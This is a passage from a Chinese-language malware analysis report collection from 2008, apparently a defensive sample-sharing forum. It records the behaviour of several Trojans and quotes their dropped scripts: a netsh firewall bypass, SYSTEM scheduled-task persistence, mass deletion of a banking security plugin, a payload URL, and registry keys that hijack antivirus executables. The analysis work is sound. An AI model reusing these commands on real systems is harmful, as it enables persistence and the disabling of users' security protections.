在其他處理程序中建立執行緒 : c:\program files\internet explorer\iexplore.exe iexplore.exe 的行為分析 : 未有可疑行為 附加資訊 : 其他行為 : 1. 網路連線行為 nmDelm.bat 的檔案內容 : :try del "C:\Documents and Settings\VMware\桌面\tavo\cao_vcc_kitman231\cao.exe" if exist "C:\Documents and Settings\VMware\桌面 \tavo\cao_vcc_kitman231\cao.exe" goto try del %0 downf.bat 的檔案內容 : "C:\WINDOWS\system32\zsmscc071001.exe" i del %0 分析結果 : 病毒類型 : Trojan 病毒檔案名:Trojan2008.12.24@002 回到第一頁 first.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-10 可執行 : 是 檔案類型 : EXE 上傳者 : kitman231 分析者 : integear 樣本骨幹圖 : first.exe └ delme.bat └ hgcheck.exe first.exe 的行為分析 : 建立檔案 : C :\Documents and Settings\[User Name]\delme.bat //生成物 C :\Windows\System32\hgcheck.exe //生成物 first.exe //母體 建立新的處理程序 : first.exe //母體 下載物 : http://www.Msnupdateslive.com/download/hgcheck.jpg //無任何特殊行為,為加殼 檔 分析結果 : 病毒類型 : Trojan-Downloader 病毒檔案名:Trojan2008.12.24@003 回到第一頁 hgcheck.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-10 可執行 : 是 檔案類型 : EXE 上傳者 : kitman231 分析者 : integear 樣本骨幹圖 : hgcheck.exe └ svchost.exe hgcheck.exe 的行為分析 : 建立檔案 : hgcheckt.exe //母體 svchost.exe //生成物 建立新的處理程序 : hgcheckt.exe //母體 備註 : 有不明顯的下載行為. 分析結果 : 病毒類型 : Trojan-Downloader 病毒檔案名:Trojan2008.12.24@004 回到第一頁 kl.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-03 可執行 : 是 檔案類型 : EXE (Packed With ASProtect) 上傳者 : kitman231 分析者 : 000110 樣本骨幹圖 : kl.exe ├ netsh.exe ├ schtasks.exe ├ reg.exe (第 1 次執行) ├ reg.exe (第 2 次執行) └ reg.exe (第 3 次執行) kl.exe 的行為分析 : 刪除檔案 : C:\AUTOEXEC.BAT //危險行為, AUTOEXEC.BAT 是系統重要檔案 建立檔案 : C:\windows\system\win.exe c:\remove\remove.CMD c:\autoexec.bat C:\Windows\System32\Gbpsv.exe C:\remove\psexec.exe C:\remove\pskill.exe C:\remove\SetACL.exe C:\remove\movefile.exe C:\remove\mata.CMD C:\remove\deleta.CMD C:\remove\removeGB.CMD C:\remove\setreg.CMD C:\remove\clngbuster.reg C:\wscntfy.dat C:\WINDOWS\system32\REGISTRANDO_007.txt 寫入檔案 : C:\WINDOWS\system\win.exe C:\remove\remove.CMD C:\autoexec.bat C:\WINDOWS\system32\Gbpsv.exe C:\remove\psexec.exe C:\remove\pskill.exe C:\remove\SetACL.exe C:\remove\movefile.exe C:\remove\mata.CMD C:\remove\deleta.CMD C:\remove\removeGB.CMD C:\remove\setreg.CMD C:\remove\clngbuster.reg 設定登錄資料 : 路徑 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C urrentVersion\Run\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\C urrentVersion\Run\ //每次系統啟動時將執行指定的程式 建立新的處理程序 : 路徑 c:\windows\system32\ 程式名稱 netsh.exe 名稱 Window s32 Gbpsv.e xe 數值 C:\windows\system\wi n.exe C:\Windows\System32\ Gbpsv.exe 啟動參數 firewall add allowedprogram C:\windows\system\win.exe RPCCC //透過 netsh.exe 建立允許規則突破 Winodws 內建防火牆 c:\windows\system32\ schtasks.exe /create /tn startt /tr c:\autoexec.bat /sc onstart /ru system //透過 schtasks.exe 建立排程工作 c:\windows\system32\ reg.exe add "HKCU\Software\Sysinternals\PsExec" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f c:\windows\system32\ reg.exe add "HKCU\Software\Sysinternals\PsKill" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f c:\windows\system32\ reg.exe add "HKCU\Software\Sysinternals\Movefile" /v EulaAccepted /t REG_DWORD /d "0x00000001" /f schtasks.exe 的行為分析 : 建立檔案 : C:\WINDOWS\Tasks\startt.job 寫入檔案 : C:\WINDOWS\Tasks\startt.job netsh.exe 的行為分析 : 設定登錄資料 : 路徑 名稱 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services win.exe \SharedAccess\Parameters\FirewallPolicy\StandardProfile\Au thorizedApplications\List\C:\WINDOWS\system\ 數值 C:\WINDOWS\syste m\win.exe:*:Enabl ed:RPCCC reg.exe 的行為分析 (第 1 次執行) : 設定登錄資料 : 路徑 HKCU\Software\Sysinternals\PsExec 名稱 EulaAccepted 數值 0x00000001 reg.exe 的行為分析 (第 2 次執行) : 設定登錄資料 : 路徑 HKCU\Software\Sysinternals\PsKill 名稱 EulaAccepted 數值 0x00000001 reg.exe 的行為分析 (第 3 次執行) : 設定登錄資料 : 路徑 HKCU\Software\Sysinternals\Movefile 名稱 EulaAccepted 數值 0x00000001 附加資訊 : 其他行為 : 無 AUTOEXEC.BAT 的檔案內容 : @echo off cd\ del/s/q c:\windows\downlo~1\gb*.* attrib -h -r -s "C:\Arquivos de programas\GbPlugin\*.exe" /s/q rd /s/q "C:\Arquivos de programas\GbPlugin\*.exe" del/s/q c:\windows\downlo~1\*.g?? del/s/q c:\windows\downlo~1\g*.* del/s/q c:\arquiv~1\GbPlugin\g*.* del/s/q c:\arquiv~1\GbPlugin\GbpSv.exe del/s/q c:\arquiv~1\GbPlugin\gbiehcef.DLL del/s/q c:\arquiv~1\GbPlugin\gbiehabn.dll del/s/q c:\arquiv~1\GbPlugin\gbieh.dll del/s/q c:\arquiv~1\GbPlugin\Cef.gpc del/s/q c:\arquiv~1\GbPlugin\Bb.gpc del/s/q c:\arquiv~1\GbPlugin\*.gmd del/s/q c:\arquiv~1\GbPlugin\*.exe del/s/q c:\arquiv~1\GbPlugin\*.dll del/s/q c:\arquiv~1\Scpad\*.dll del/s/q c:\arquiv~1\Scpad\*.bin del/s/q c:\arquiv~1\GbPlugin\*.gmd del/s/q c:\arquiv~1\GbPlugin\*.gpc del/s/q c:\arquiv~1\GbPlugin\*.gmd @echo. ^z startt.job 的檔案內容 : 在系統啟動時執行 c:\autoexec.bat 分析結果 : 病毒類型 : Trojan-Agent 病毒檔案名:Trojan2008.12.24@005 回到第一頁 securefileshredderinstallerdualen.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-03 可執行 : 是 檔案類型 : EXE (安裝程式) 上傳者 : kitman231 分析者 : 000110 樣本骨幹圖 : securefileshredderinstallerdualen.exe └ sfssetupdual.exe (第 1 次執行) └ sfssetupdual.tmp (位於 is-3i6ur.tmp\ 資料夾下) └ sfssetupdual.exe (第 2 次執行) └ sfssetupdual.tmp (位於 is-0r26f.tmp\ 資料夾下) ├ taskkill.exe ├ regsvr32.exe ├ fileshredder.exe └ filemonitor.exe securefileshredderinstallerdualen.exe 的行為分析 : 設定登錄資料 : 路徑 名稱 數值 HKEY_LOCAL_MACHINE\SOFTWARE\Micro SecureFileShred %Patch%\SecureFileShredderInst soft\Windows\CurrentVersion\Run\ derDownloader allerDualEn_wc_kitman231.exe* * : %Patch% 對應檔案 SecureFileShredderInstallerDualEn_wc_kitman231.exe 的相對位置 建立檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temporary Internet Files\Content.IE5\5YNF88C6\SecureFileShredderSetupDualEn[1].exe //從互聯網下 載 C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup\SFSSetupDual.exe 寫入檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup\SFSSetupDual.exe 建立資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\FileShredderSetup 刪除登錄資料 : 路徑 名稱 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer SecureFileShredderDownl sion\Run\ oader 建立新的處理程序 : 路徑 c:\documents and settings\[User Name]\local settings\temp\fileshreddersetup\ 程式名稱 sfssetupdual.exe 啟動參數 /tid=6200 sfssetupdual.exe 的行為分析 (第 1 次執行) : 建立資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp 建立檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp 寫入檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp 建立新的處理程序 : 路徑 c:\documents and settings\[User Name]\local settings\temp\is-3i6ur.tmp\ 程式名稱 sfssetupdual.tmp 啟動參數 /SL5="$602E8,1173147,53248,C:\DOCUME ~1\[User Name]\LOCALS~1\Temp\FileShredderSetup \SFSSetupDual.exe" /tid=6200 sfssetupdual.tmp 的行為分析 : 建立資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp 建立檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll 寫入檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll 建立新的處理程序 : 路徑 c:\documents and settings\[User Name]\local settings\temp\fileshredders etup\ 程式名稱 啟動參數 sfssetupdual.e /verysilent /norestart xe /sl5="$602e8,1173147,53248,c:\docume~1\[Use r Name]\locals~1\temp\fileshreddersetup\sfssetu pdual.exe" /tid=6200 刪除檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_RegDLL.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp\_isetup\_shfoldr.dll 刪除資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-PUPCL.tmp sfssetupdual.exe 的行為分析 (第 2 次執行) : 刪除檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp\SFSSetupDual.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp 建立資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp 建立檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp\SFSSetupDual.tmp 刪除資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-3I6UR.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-0R26F.tmp 建立新的處理程序 : 路徑 程式名稱 c:\documents and sfssetupdual.tmp settings\[User Name]\local settings\temp\is-0 r26f.tmp\ 啟動參數 /SL5="$702E8,1173147,53248,C:\DOCUME~1\[User Name]\LOCALS~1\Temp\FileShredderSetup\SFSSetupD ual.exe" /verysilent /norestart /sl5="$602e8,1173147,53248,c:\docume~1\[User Name]\locals~1\temp\fileshredderset sfssetupdual.tmp 的行為分析 : 建立資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp 建立檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll C:\Program Files\SecureFileShredder\unins000.dat C:\Program Files\SecureFileShredder\is-3NR36.tmp C:\Program Files\SecureFileShredder\unins000.exe C:\Program Files\SecureFileShredder\is-3JKNR.tmp C:\Program Files\SecureFileShredder\FileShredder.exe C:\Program Files\SecureFileShredder\is-SOE7C.tmp C:\Program Files\SecureFileShredder\FileMonitor.exe C:\Program Files\SecureFileShredder\is-11JU9.tmp C:\Program Files\SecureFileShredder\FileShredder.xml C:\Program Files\SecureFileShredder\is-QMNV3.tmp C:\Program Files\SecureFileShredder\securefileshredder.url C:\Program Files\SecureFileShredder\is-9QPAD.tmp C:\Program Files\SecureFileShredder\FileShredder.ico C:\Program Files\SecureFileShredder\is-82A76.tmp C:\Program Files\SecureFileShredder\ExtSFS.dll C:\Program Files\SecureFileShredder\is-EKPCD.tmp C:\Program Files\SecureFileShredder\FShellEx.dll C:\Program Files\SecureFileShredder\is-0EIGP.tmp C:\Program Files\SecureFileShredder\SafeOper.dll C:\Program Files\SecureFileShredder\is-9KQPP.tmp C:\Program Files\SecureFileShredder\ExpBtn.dll C:\Documents and Settings\All Users\「開始」功能表\程式集 \SecureFileShredder\Launch SecureFileShredder.lnk C:\Documents and Settings\All Users\「開始」功能表\程式集 \SecureFileShredder\SecureFileShredder Home Page.lnk C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet Explorer\Quick Launch\SecureFileShredder.lnk 寫入檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll C:\Program Files\SecureFileShredder\is-3NR36.tmp C:\Program Files\SecureFileShredder\is-3JKNR.tmp C:\Program Files\SecureFileShredder\is-SOE7C.tmp C:\Program Files\SecureFileShredder\is-11JU9.tmp C:\Program Files\SecureFileShredder\is-QMNV3.tmp C:\Program Files\SecureFileShredder\is-9QPAD.tmp C:\Program Files\SecureFileShredder\is-82A76.tmp C:\Program Files\SecureFileShredder\is-EKPCD.tmp C:\Program Files\SecureFileShredder\is-0EIGP.tmp C:\Documents and Settings\All Users\「開始」功能表\程式集 \SecureFileShredder\Launch SecureFileShredder.lnk C:\Documents and Settings\All Users\「開始」功能表\程式集 \SecureFileShredder\SecureFileShredder Home Page.lnk C:\Documents and Settings\All Users\桌面\Secure FileShredder.lnk C:\Documents and Settings\[User Name]\Application Data\Microsoft\Internet Explorer\Quick Launch\SecureFileShredder.lnk C:\Program Files\SecureFileShredder\unins000.dat 設定登錄資料 : 路徑 HKEY_LOCAL_MACHINE\SOFTWARE\Micros oft\Windows\CurrentVersion\Shell Extensions\Approved\ HKEY_LOCAL_MACHINE\SOFTWARE\Micros oft\Windows\CurrentVersion\Shell Extensions\Approved\ //以上 2 項變更將會變更右鍵功能表 HKEY_LOCAL_MACHINE\SOFTWARE\Micros oft\Windows\CurrentVersion\Run\ 名稱 {FEAED91E-FB2D-4842-85 93-CB82B1A4222D} 數值 SecureFileShredder shell extention {D99C619E-00DE-44bc-88 70-D3030D4708B4} SecureFileShredder shell extention SecureFileShredder HKEY_LOCAL_MACHINE\SOFTWARE\Micros oft\Windows\CurrentVersion\Run\ FileMonitor C:\Program Files\SecureFileShred der\FileShredder.exe C:\Program Files\SecureFileShred der\FileMonitor.exe //以上 2 項變更將會導致每次系統啟動時執行指定程式 刪除檔案 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_RegDLL.tmp C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp\_isetup\_shfoldr.dll 刪除資料夾 : C:\Documents and Settings\[User Name]\Local Settings\Temp\is-ULNU3.tmp 建立新的處理程序 : 路徑 c:\windows\system32\ c:\windows\system32\ c:\windows\system32\ 程式名稱 taskkill.exe taskkill.exe regsvr32.exe c:\windows\system32\ regsvr32.exe c:\windows\system32\ regsvr32.exe c:\windows\system32\ regsvr32.exe c:\program fileshredder.exe files\securefileshredder\ c:\program filemonitor.exe files\securefileshredder\ 啟動參數 /F /IM FileShredder.exe /F /IM FileMonitor.exe /s "C:\Program Files\SecureFileShredder\ExtSFS.dll" /s "C:\Program Files\SecureFileShredder\FShellEx.dll" /s "C:\Program Files\SecureFileShredder\SafeOper.dll" /s "C:\Program Files\SecureFileShredder\ExpBtn.dll" taskkill.exe 的行為分析 : 寫入檔案 \Device\NamedPipe\lsarpc //從管道尋找執行中的應用程式 regsvr32.exe 的行為分析 : 建立登錄機碼 : HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\SFSSh ellExtension HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandler s\SFSShellExtension HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00A A002F954E}\shellex\ContextMenuHandlers\SFSShellExtension 設定登錄資料 : 路徑 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\* \shellex\ContextMenuHandlers\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\D irectory\shellex\ContextMenuHandlers\ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\C LSID\{645FF040-5081-101B-9F08-00AA002F95 4E}\shellex\ContextMenuHandlers\ //以上 3 項變更將會變更右鍵功能表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Internet Explorer\Toolbar\ 名稱 數值 SFSShellExtension {FEAED91E-FB2D-4842-859 3-CB82B1A4222D} SFSShellExtension {FEAED91E-FB2D-4842-859 3-CB82B1A4222D} SFSShellExtension {7915AA00-43C5-432d-800 D-6F3FD2590F12} {D99C619E-00DE44bc-8870-D3030 D4708B4} //以上 1 項變更將會變更 Internet Explorer 的工具列 附加資訊 : 其他行為 : 1. c:\windows\system32\svchost.exe 寫入檔案 : \Device\NamedPipe\lsarpc //Taskkill.exe 的後繼動作 2. c:\windows\system32\wbem\wmiprvse.exe 寫入檔案 : \Device\NamedPipe\lsarpc //Taskkill.exe 的後繼動作 分析結果 : 病毒類型 : Trojan-Downloader 病毒檔案名:Trojan2008.12.24@006 回到第一頁 setup.exe 的分析報告 一般資訊 : 分析日期 : 2008-12-05 可執行 : 是 檔案類型 : EXE 上傳者 : integear 分析者 : integear 樣本骨幹圖 : setup.exe //母體 └ zuhrn0.cmd //生成物 setup.exe 的行為分析 : 建立檔案 : setup.exe //母體 zuhrn0.cmd //生成物 建立新的處理程序 : setup.exe //母體 備註: 有不明下載行為 分析結果 : 病毒類型 : Trojan-Downloader 病毒檔案名:Trojan2008.12.24@007 回到第一頁 樣本名:w32time.dll 類型:Trojan-KillAV-Rootkit 病毒檔案名:Trojan2008.12.24@008 上傳者:kitman231 分析者:asusp4b533 分析日期:20081206 分析工具:ThreatExpert 可執行:是 建立檔案: c:\autorun.inf %Temp%\242687 %Temp%\345234.txt %Temp%\345328 c:\system.dll %System%\appwinproc.dll %System%\Nskhelper2.sys %System%\NsPass0.sys %System%\NsPass1.sys %System%\NsPass2.sys %System%\NsPass3.sys %System%\NsPass4.sys 程序及記憶體行為: 遠端建立記憶體空間: 建立於->%System%\svchost.exe DLL 遠端注入: %System%\appwinproc.dll ->%Windir%\explorer.exe ->%ProgramFiles%\messenger\msmsgs.exe ->%Windir%\dns\sdnsmain.exe ->%System%\svchost.exe w32time.dll ->generic host process filename ->%System%\svchost.exe 驅動程式載入: %System%\nskhelper2.sys %System%\nspass0.sys %System%\nspass1.sys %System%\nspass2.sys %System%\nspass3.sys %System%\nspass4.sys 登錄檔建立行為: o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ACKWIN32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTI-TROJAN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivir.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atrack.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUTODOWN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCONSOL.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVE32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGCTRL.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avk.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsynmgr.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxonsol.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIND.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DAVPFW.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dbg.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\debu.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DV95_O.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EFINET32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESPWATCH.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorewclass.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-prot95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\f-stopw.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fir.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fp-win.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ice.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMOON.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSSUPPNT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iom.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JED.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kabackreport.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kasmain.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kav32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kpfwsvc.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPPMain.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRF.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVPreScan.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kwatch.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lamapp.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lockdown2000.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luall.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUCOMSERVER.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcafee.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\microsoft.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mon.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\moniker.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.exe o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution 